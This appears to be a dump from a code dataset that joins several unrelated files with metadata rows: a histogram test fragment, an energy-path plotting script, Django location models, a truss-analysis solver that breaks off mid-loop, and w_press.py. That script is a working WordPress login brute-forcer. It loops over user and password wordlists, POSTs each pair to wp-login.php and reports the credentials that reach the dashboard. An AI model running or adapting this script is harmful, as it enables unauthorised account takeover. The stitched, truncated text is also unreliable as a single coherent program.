assert ct.call_count == 3
#nbins
self.artist.nbins += 1
self.artist.update()
self.artist.update()
assert ct.call_count == 4
#xlog
self.artist.xlog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#ylog -- no call
self.artist.ylog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#cumulative -- no call
self.artist.cumulative ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#normed -- no call
self.artist.normed ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#subset style -- no call
self.artist.layer.style.color = '#00ff00'
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#subset state
self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
self.artist.update()
self.artist.update()
assert ct.call_count == 6
def test_rescale_on_state_changes(self):
ct = self.setup_hist_scale_counter()
assert ct.call_count == 0
self.artist.update()
self.artist.update()
assert ct.call_count == 1
#lo
self.artist.lo -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 2
#hi
self.artist.hi -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 3
#nbins
self.artist.nbins += 1
self.artist.update()
self.artist.update()
assert ct.call_count == 4
#xlog
self.artist.xlog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#ylog
self.artist.ylog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 6
#cumulative
self.artist.cumulative ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 7
#normed
self.artist.normed ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 8
#subset state
self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
self.artist.update()
self.artist.update()
assert ct.call_count == 9
#subset style -- no call
self.artist.layer.style.color = '#00ff00'
self.artist.update()
self.artist.update()
assert ct.call_count == 9
| bsd-3-clause | 1,918,965,604,323,963,400 | 30.951673 | 76 | 0.606981 | false | 3.491064 | true | false | false |
sergeiliashko/sif | graphics/plotenergy.py | 1 | 2486 | import numpy as np
import matplotlib.pyplot as plt
from sys import argv
import matplotlib.gridspec as gridspec
from scipy.signal import argrelextrema
from scipy.interpolate import interp1d
from matplotlib.ticker import FormatStrFormatter
import matplotlib.patches as patches
import matplotlib.pyplot as plt
def main(energy_path, fName, interpolate=False):
    # set to True to trim the path to its outermost minima (see the commented code below)
    usetrueminimas = False
minimums = argrelextrema(energy_path, np.less_equal)[0]
#print(energy_path[minimums])
maxima = argrelextrema(energy_path, np.greater)[0]
#print(energy_path[maxima])
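    # Sanity example (not from the original script):
    #   argrelextrema(np.array([3, 1, 2, 0, 5]), np.less_equal)[0] -> array([1, 3])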
energy_path = energy_path - np.min(energy_path)
#if(usetrueminimas):
# energy_path=energy_path[minimums[0]:minimums[-1]]
#
fig, ax = plt.subplots()
#ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
#ax.set_xticklabels([]) # disable ticks
#ax.set_aspect('auto')
M = energy_path.shape[0]
#plt.yticks(np.arange(min(energy_path), max(energy_path)+0.4, 0.1))
plt.ylim([np.min(energy_path) - .06, np.max(energy_path) + .4])
plt.ylabel('eV')
plt.xlim([0-5, M+7])
x = range(0, M)
y = energy_path
plt.plot(energy_path, linewidth=3)
#f2 = interp1d(x, y, kind='cubic')
#xnew = np.linspace(0, M-1, num=1000, endpoint=True)
#
#if(interpolate):
# plt.plot(xnew, f2(xnew), linewidth=3)
#else:
# plt.plot(x, y, linewidth=3)
#
#rn = ['I','II','III','IV','V','VI','VII']
#
#if(usetrueminimas):
# minimums = (minimums-minimums[0]) #shift the index of minimas to match new size of enrgy
# minimums[-1] = minimums[-1]-1
#
#ax.plot([minimums], [energy_path[minimums]], 'o', color='green')
#for i in range(len(minimums)):
#ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]), xytext=(minimums[i]-2, energy_path[minimums[i]]-0.04))#, arrowprops=dict(facecolor='black', shrink=0.05),)
#ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]), xytext=(minimums[i]-0.2, energy_path[minimums[i]]-0.006))#, arrowprops=dict(facecolor='black', shrink=0.05),)
plt.savefig((f"{fName}.eps"),bbox_inches='tight', dpi=300)
if __name__ == "__main__":
try:
print(argv[0],argv[1],argv[2])
energy_path = np.loadtxt(argv[1])
main(energy_path, argv[2])
#script, params_file, runtime_settings, vcoords_file = argv
    except Exception:
        print("ERROR: You didn't provide a valid data file for the program", argv[0])
| gpl-3.0 | 8,936,404,085,841,171,000 | 37.84375 | 181 | 0.641995 | false | 2.921269 | false | false | false |
psephologic/everyonevoting | everyonevoting/locations/models-dev.py | 1 | 1466 | from django.db import models
from core.models import BaseEMSModel, Organization
class GeoDistrict(BaseEMSModel):
"""EML 150."""
# TODO: At some point, consider using django-mptt
# TODO: Should we have a separate model for the district type, where
# things defining the type of district can be made (ex. pollings places are at this level)?
organization = models.ForeignKey(Organization)
name = models.CharField(max_length=100, default='Global')
LEVEL = (
('Global', 'Global'),
('Continent', 'Continent'),
('Nation', 'Nation'),
)
level = models.CharField(max_length=12, blank=True, null=True, choices=LEVEL, default='Global')
short_name = models.CharField(max_length=20, blank=True)
description = models.CharField(max_length=250, blank=True,
default='The global district all voters and elections are assigned to '
'by default. Elections can take place anywhere in the world.')
parent = models.ForeignKey('GeoDistrict', null=True, blank=True, default=None)
def __str__(self):
return self.name
class PollingLocation(BaseEMSModel):
name = models.CharField(max_length=100, default='Polling Place')
address = models.CharField(max_length=100, blank=True, null=True)
is_active = models.BooleanField(default=True)
geo_district = models.ForeignKey(GeoDistrict, null=True, blank=True, default=None)
def __str__(self):
return self.name | agpl-3.0 | 8,356,047,771,490,293,000 | 38.648649 | 99 | 0.688267 | false | 3.788114 | false | false | false |
satyajeet76626/WordPress_BrutForce | w_press.py | 1 | 5159 | #!usr/bin/python3
# Modules related comments are only applied in this Script.
import requests # Using this module to send request and getting response from local_server.
import sys # Using this module for writting formated text on the terminal.
from colorama import Fore,Style # Using this module for Formating my text means appling color,style,size.. etc
import time
import os # Using this module to print execution time of main() function.
def main():
os.system("clear") # clear the screen.
print(Fore.CYAN + "##########################################################// \\\################################################################")
print(Fore.CYAN + "#########################################################// $ $ WeLCoMe $ $ \\\###############################################################")
time.sleep(0.5)
print(Fore.CYAN + '''########################################################// \\\##############################################################''')
time.sleep(0.5)
print(Fore.CYAN + '''#######################################################// \\\#############################################################''')
time.sleep(0.5)
print(Fore.CYAN + "######################################################// \\\############################################################")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t#// W_PRESS.PY \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t#//''''''''''''''''''''''''''''''''''\\\#")
time.sleep(0.5)
print(Fore.CYAN +"\t\t\t\t\t\t#//________Written By: Satyajeet________\\\#")
time.sleep(0.5)
print(Fore.RED+'\n\n\t\t'+Fore.YELLOW+'Watch: https://youtu.be/sh2klOT3uws ||'+Fore.RED+'|| Download: https://github.com/satyajeet76626/WordPress_BrutForce.git')
time.sleep(0.3)
print(Fore.RED + "\n\n\t\t\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> WaRnInG..!!! : <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
time.sleep(0.3)
print(Fore.RED + '\n\t\t\t\t"::::::::If you are not able to RUN this script, Please! Read README file::::::::"')
print(Fore.RED + '\n\t\t\t\t:::::::::::::::::::::::::::'+Fore.YELLOW +'"OR Run installer.py"'+Fore.RED+':::::::::::::::::::::::::::::::')
# collecting url in a variable 'url'.
url = 'http://localhost/wp-login.php'
print(Fore.CYAN+"\n\nNOTE : "+Fore.WHITE+"Put your 'Users_list' and 'Password_list' File in same directory where 'w_press.py Script is.'" )
print(Fore.YELLOW + "\n\nW_PrEsS >> ",end=' ')
# Taking input of users_list and password_list from user.
userslist_file=input(Fore.GREEN + "Enter Users_list fileName: ")
print(Fore.YELLOW + "\n\nW_PrEsS >> ",end=' ')
passwordslist_file=input(Fore.GREEN + "Enter Password_list fileName: ")
# Reading UserName and PassWord from files.
users=open(userslist_file,'r').readlines()
passwords=open(passwordslist_file,'r').readlines()
print(Fore.YELLOW+"\n\t\t\t______________Thanks For Using..!! ('Sit_back && Have Your Coffee!')________________")
# Finding Total Number of UserNames and PassWords
users_len=len(users)
pass_len=len(passwords)
total=(users_len*pass_len)
print(Fore.CYAN + "\n\n\rTotAl Passw0rD tO TrY: ",total)
c=0
for user in users:
for passwd in passwords:
            # Send a login POST with this username & password pair to the WordPress site on the local server (apache2).
http = requests.post(url, data = {'log':user,'pwd':passwd,'wp-submit':'Log In'})
datas = http.content
# tryingh to match word 'Dashboard' in the content.
if 'Dashboard' in str(datas):
c+=1
complete=(c*100)//total
# Formatting My OutPut to display my contents in a better way.
sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd UserName: " + Fore.GREEN + "'{}'".format(user))
sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd PassW0rd: " + Fore.GREEN + "'{}'".format(passwd))
print(Fore.BLUE + "\n\nPasswords checked: ",end=" ")
print(Fore.GREEN + "{}".format(c),)
print(Fore.MAGENTA + "\t\t\t\t\t"+ Fore.GREEN +" {}%".format(complete),end=' ')
print(Fore.MAGENTA+"CompLeTed.....\n\n")
                # Quit once valid credentials are found.
quit()
else:
c+=1
complete=(c*100)//total
sys.stdout.write(Fore.RED + "\r\t\t\t\t\t\t[-] tRyInG....."+Fore.GREEN + "\t{}%".format(complete))
sys.stdout.flush()
print(Fore.CYAN+"\n\n\t\t\t\t\t\tSoRRy!!, PaSSwOrD NoT FoUnD.!\n")
quit()
# Reset the formatted text colors and styles.
# print(Style.RESET_ALL)
# Uncomment below lines to display program execution time.
# t0=time.time()
# main()
# t1=time.time()
# print("ExecuTion Time: ",t1-t0)
if __name__=='__main__':main()
| mit | -6,060,353,860,117,834,000 | 45.9 | 169 | 0.499128 | false | 3.092926 | false | false | false |
rgrandin/MechanicsTools | truss/truss_solver.py | 1 | 22478 | #
# -*- coding: utf-8 -*-
#
# Python-Based Truss Solver
# =============================================================
#
# Author: Robert Grandin
#
# Date: Fall 2007 (Creation of original Fortran solution in AerE 361)
# October 2011 (Python implementation)
# November 2014 (Clean-up and graphical/VTK output)
#
#
# PURPOSE:
# This code solves a truss for the internal load, strain, and stress of each member.
# Being a truss, all members are assumed to be two-force members and no bending
# moments are considered. Both 2-dimensional and 3-dimensional trusses can be
# solved with this code.
#
#
# INSTRUCTIONS & NOTES:
# - Dictionaries are used to define the entity properties. Names for the properties
# should be self-explanatory. Some notes:
# - '_flag' entries identify either displacement ('d') or force ('f') boundary
# conditions (BCs). Applied forces require force BCs to be specified.
# Pin/roller locations require displacement BCs. Free-to-move nodes will
# typically have 0-force BCs.
# - '_bcval' entries specify the BC value for the corresponding flag.
# - If solving a 2-dimensional problem, constrain node motion in the 3rd
# dimension to be 0. Allowing nodal motion in the 3rd dimension (by setting
# the constraint to 0-force) will produce a matrix with non-empty null-space.
# Displacements in the third dimension will reside in this null-space.
# - Input data can be saved in a python data file. Create a module for your
# problem and define a function which returns 'nodes, members'.
# - Examples shown below for 2D, 3D, and file-based input. See data file
# 'em514_problem08.py' for an example of how to write an input file.
#
#
# HOMEWORK DISCLAIMER:
# This tool is intended to be a learning aid. Feel free to use it to check your
# work, but do not use it in place of learning how to find the solution yourself.
#
# When using this tool for statics problems, the member loads calculated by this
# tool will not match the correct answer for the statics problem. This is due
# to the fact that this tool considers displacements whereas displacements are
# not considered in a statics problem (but displacements are considered in
# mechanics problems). Even though the numerical results will not match when
# checking statics results, the discrepancy should be small enough to enable
# you to determine if your statics result is correct.
#
#
#
# ========================
#
# 2D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -800.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 36.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 72.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 36.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -1000.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 1, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 2, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 0, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# 3D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 20.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': 0.0e0, 'zflag': 'f', 'zbcval': 1000.0e0})
#nodes.append({'x': 0.0e0, 'y': 25.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 0.0e0, 'y': 0.0e0, 'z': 10.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 3, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# DATA FILE SAMPLE INPUT
#
import em274_assess5_2017 # Name of python file, no extension
reload(em274_assess5_2017) # Force reload to catch any updates/revisions
nodes, members = em274_assess5_2017.DefineInputs() # Call input-definition function
# Set scale factor to make display more-easily understood.
displayScaleFactor = 100.0
# =============================================================================================
#
#
#
# NO EDITS REQUIRED BELOW HERE
#
#
#
# =============================================================================================
# ========================
#
# IMPORT PYTHON MODULES REQUIRED FOR SOLUTION
#
import numpy # General linear algebra capability
import scipy # Advanced routines for evaluating solution quality
import matplotlib.pyplot as plt # 2D plotting
# ========================
#
# ECHO INPUT VALUES TO SCREEN
#
# Calculate Member Properties
nnodes = len(nodes)
nmem = len(members)
# Write Input Information
print(' ')
print('==============================================')
print(' ')
print(' INPUT INFORMATION')
print(' ')
print('==============================================')
print(' ')
print('Pin Input Information')
print('--------------------------------------')
for i in range(nnodes):
print('Node % 3d' % (i))
print(' Position: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['x'], nodes[i]['y'], nodes[i]['z']))
print(' BC Type: ( %*.*s, %*.*s, %*.*s )' % (12,12,nodes[i]['xflag'], 12,12,nodes[i]['yflag'], 12,12,nodes[i]['zflag']))
print(' BC Value: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['xbcval'], nodes[i]['ybcval'], nodes[i]['zbcval']))
print(' ')
print(' ')
print(' ')
print(' ')
print('Member Input Information')
print('--------------------------------------')
for i in range(nmem):
print('Member % 3d' % (i))
print(' Start, end nodes: ( % 3d, % 3d )' % (members[i]['start'], members[i]['end']))
print(' Young\'s Modulus: % 12.3g' % (members[i]['E']))
print(' Cross-sectional Area: % 12.3g' % (members[i]['A']))
print(' Yield Strength: % 12.3g' % (members[i]['sigma_yield']))
print(' Ultimate Strength: % 12.3g' % (members[i]['sigma_ult']))
print(' ')
print(' ')
print(' ')
print(' ')
# ========================
#
# SETUP MATRIX EQUATION AND SOLVE
#
# Calculate member properties
for i in range(nmem):
dx = nodes[members[i]['end']]['x'] - nodes[members[i]['start']]['x']
dy = nodes[members[i]['end']]['y'] - nodes[members[i]['start']]['y']
dz = nodes[members[i]['end']]['z'] - nodes[members[i]['start']]['z']
members[i]['L'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
members[i]['costheta_x'] = dx/members[i]['L']
members[i]['costheta_y'] = dy/members[i]['L']
members[i]['costheta_z'] = dz/members[i]['L']
# Build stiffness matrix
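# Each member contributes k = A*E/L times the outer product of its direction
# cosines c = (cos_x, cos_y, cos_z), scattered in the standard 2x2 block pattern
#   K_member = k * [  c c^T   -c c^T ]
#                  [ -c c^T    c c^T ]
# to the start/end node DOFs, which is what the unrolled assignments below do.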
stiffness = numpy.zeros((3*nnodes,3*nnodes), dtype='float64')
for i in range(nmem):
tbm2 = 3*members[i]['start'] + 2
tbm1 = 3*members[i]['start'] + 1
tb = 3*members[i]['start']
tem2 = 3*members[i]['end'] + 2
tem1 = 3*members[i]['end'] + 1
te = 3*members[i]['end']
k = members[i]['A']*members[i]['E']/members[i]['L']
stiffness[tb][tb] += k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[tb][tbm1] += k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[tb][tbm2] += k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tb][te] += -k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[tb][tem1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[tb][tem2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tbm1][tb] += k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tbm1][tbm1] += k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tbm1][tbm2] += k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tbm1][te] += -k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tbm1][tem1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tbm1][tem2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tbm2][tb] += k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tbm2][tbm1] += k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tbm2][tbm2] += k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[tbm2][te] += -k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tbm2][tem1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tbm2][tem2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[te][tb] += -k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[te][tbm1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[te][tbm2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[te][te] += k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[te][tem1] += k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[te][tem2] += k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tem1][tb] += -k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tem1][tbm1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tem1][tbm2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tem1][te] += k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tem1][tem1] += k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tem1][tem2] += k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tem2][tb] += -k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tem2][tbm1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tem2][tbm2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[tem2][te] += k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tem2][tem1] += k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tem2][tem2] += k*members[i]['costheta_z']*members[i]['costheta_z']
# Calculate average of main diagonal for numerical stability
average = 0.0e0
for i in range(3*nnodes):
average += stiffness[i][i]
average /= float(3*nnodes)
# Create and fill arrays to be used when solving matrix equation
A = numpy.zeros(stiffness.shape, dtype='float64')
b = numpy.zeros((3*nnodes,1), dtype='float64')
for i in range(nnodes):
icol = 3*i
if(nodes[i]['xflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['xbcval']
A[icol][icol] = -average
if(nodes[i]['xflag'] == 'f'):
b[icol] += nodes[i]['xbcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
icol = 3*i + 1
if(nodes[i]['yflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['ybcval']
A[icol][icol] = -average
if(nodes[i]['yflag'] == 'f'):
b[icol] += nodes[i]['ybcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
icol = 3*i + 2
if(nodes[i]['zflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['zbcval']
A[icol][icol] = -average
if(nodes[i]['zflag'] == 'f'):
b[icol] += nodes[i]['zbcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
# Solve the system
x,res,rank,singularvals = numpy.linalg.lstsq(A,b)
# Calculate nodal results
for i in range(nnodes):
if(nodes[i]['xflag'] == 'f'):
nodes[i]['xdisp'] = x[3*i+0][0]
nodes[i]['xforce'] = nodes[i]['xbcval']
if(nodes[i]['xflag'] == 'd'):
nodes[i]['xdisp'] = nodes[i]['xbcval']
        nodes[i]['xforce'] = x[3*i+0][0]*average # the -average diagonal entry means the solver returns reaction/average; scale back
if(nodes[i]['yflag'] == 'f'):
nodes[i]['ydisp'] = x[3*i+1][0]
nodes[i]['yforce'] = nodes[i]['ybcval']
if(nodes[i]['yflag'] == 'd'):
nodes[i]['ydisp'] = nodes[i]['ybcval']
        nodes[i]['yforce'] = x[3*i+1][0]*average # undo the -average conditioning scale
if(nodes[i]['zflag'] == 'f'):
nodes[i]['zdisp'] = x[3*i+2][0]
nodes[i]['zforce'] = nodes[i]['zbcval']
if(nodes[i]['zflag'] == 'd'):
nodes[i]['zdisp'] = nodes[i]['zbcval']
        nodes[i]['zforce'] = x[3*i+2][0]*average # undo the -average conditioning scale
nodes[i]['xnew'] = nodes[i]['x'] + nodes[i]['xdisp']
nodes[i]['ynew'] = nodes[i]['y'] + nodes[i]['ydisp']
nodes[i]['znew'] = nodes[i]['z'] + nodes[i]['zdisp']
# Calculate member results
for i in range(nmem):
dx = nodes[members[i]['end']]['xnew'] - nodes[members[i]['start']]['xnew']
dy = nodes[members[i]['end']]['ynew'] - nodes[members[i]['start']]['ynew']
dz = nodes[members[i]['end']]['znew'] - nodes[members[i]['start']]['znew']
members[i]['Lnew'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
members[i]['epsilon'] = (members[i]['Lnew'] - members[i]['L'])/members[i]['L']
members[i]['stress'] = members[i]['epsilon']*members[i]['E']
members[i]['load'] = members[i]['stress']*members[i]['A']
# Calculate null space of A (http://stackoverflow.com/questions/2992947/calculating-the-null-space-of-a-matrix)
u, s, vh = numpy.linalg.svd(A)
null_mask = (s <= 1.0e-15)
null_space = scipy.compress(null_mask, vh, axis=0)
nullspace = scipy.transpose(null_space)
# ========================
#
# OUTPUT RESULTS TO TERMINAL
#
print(' ')
print('==============================================')
print(' ')
print(' RESULTS')
print(' ')
print('==============================================')
print(' ')
print('Pin Displacements (x,y,z)')
print('--------------------------------------')
for i in range(nnodes):
print('Node % 3d: % 10.5e % 10.5e % 10.5e' % (i,nodes[i]['xdisp'],nodes[i]['ydisp'],nodes[i]['zdisp']))
print(' ')
print(' ')
print('Member Results')
print('--------------------------------------')
for i in range(nmem):
print('Member % 3d:' % (i))
print(' Internal Load: % 10.5e' % (members[i]['load']))
print(' Axial Strain: % 10.5e' % (members[i]['epsilon']))
print(' Axial Stress: % 10.5e' % (members[i]['stress']))
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
print(' --> YIELD STRESS SURPASSED')
if(members[i]['stress'] > members[i]['sigma_ult']):
print(' --> ULTIMATE STRESS SURPASSED')
print(' ')
print(' ')
print(' ')
print(' ')
print('==============================================')
print(' ')
print(' SOLUTION QUALITY INDICATORS')
print(' ')
print('==============================================')
print(' ')
print('Rank of A matrix: %d' % (rank))
print(' ')
print('Size of A: %d' % (3*nnodes))
print(' ')
print('Condition Number: % 10.3e (smaller is better)' % (singularvals.max()/singularvals.min()))
print(' General rule: If condition number is O(10^n), discard last n digits')
print(' from the results.')
print(' ')
print('Singular values: ')
for i in range(len(singularvals)):
print(' % 12.10g' % (singularvals[i]))
print(' ')
print('Nullspace of A:')
print(nullspace)
# ========================
#
# GENERATE PLOTS
#
xOriginal = numpy.zeros((nnodes))
yOriginal = numpy.zeros((nnodes))
zOriginal = numpy.zeros((nnodes))
xNew = numpy.zeros((nnodes))
yNew = numpy.zeros((nnodes))
zNew = numpy.zeros((nnodes))
for i in range(nnodes):
xOriginal[i] = nodes[i]['x']
xNew[i] = xOriginal[i] + nodes[i]['xdisp']*displayScaleFactor
yOriginal[i] = nodes[i]['y']
yNew[i] = yOriginal[i] + nodes[i]['ydisp']*displayScaleFactor
zOriginal[i] = nodes[i]['z']
zNew[i] = zOriginal[i] + nodes[i]['zdisp']*displayScaleFactor
xmin1 = numpy.min(xOriginal)
xmin2 = numpy.min(xNew)
xmin = min(xmin1,xmin2)
ymin1 = numpy.min(yOriginal)
ymin2 = numpy.min(yNew)
ymin = min(ymin1,ymin2)
zmin1 = numpy.min(zOriginal)
zmin2 = numpy.min(zNew)
zmin = min(zmin1,zmin2)
xmax1 = numpy.max(xOriginal)
xmax2 = numpy.max(xNew)
xmax = max(xmax1,xmax2)
ymax1 = numpy.max(yOriginal)
ymax2 = numpy.max(yNew)
ymax = max(ymax1,ymax2)
zmax1 = numpy.max(zOriginal)
zmax2 = numpy.max(zNew)
zmax = max(zmax1,zmax2)
xRange = xmax - xmin
yRange = ymax - ymin
zRange = zmax - zmin
factor = 0.02
# Generate XY view
plt.figure()
plt.plot(xOriginal, yOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, yNew, 'or', label='New Position')
for i in range(nmem):
xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
yy = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
yy2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([ymin - yRange*factor, ymax + yRange*factor])
plt.xlabel('X Position')
plt.ylabel('Y Position')
plt.title('Truss - XY View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XY_View.png')
# If displacement in the Z-direction exists, plot XZ and YZ views. Note that
# the zRange cannot be compared to precisely '0' due to floating-point errors,
# so it is compared to a very small value instead. Also note that 'x' and 'y'
# refer to the 2D plot and therefore do not necessarily correspond directly
# to the 'x' and 'y' coordinates of the nodes.
if(zRange > 1.0e-5):
plt.figure()
plt.plot(xOriginal, zOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, zNew, 'or', label='New Position')
for i in range(nmem):
xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
plt.xlabel('X Position')
plt.ylabel('Z Position')
plt.title('Truss - XZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XZ_View.png')
plt.figure()
plt.plot(yOriginal, zOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(yNew, zNew, 'or', label='New Position')
for i in range(nmem):
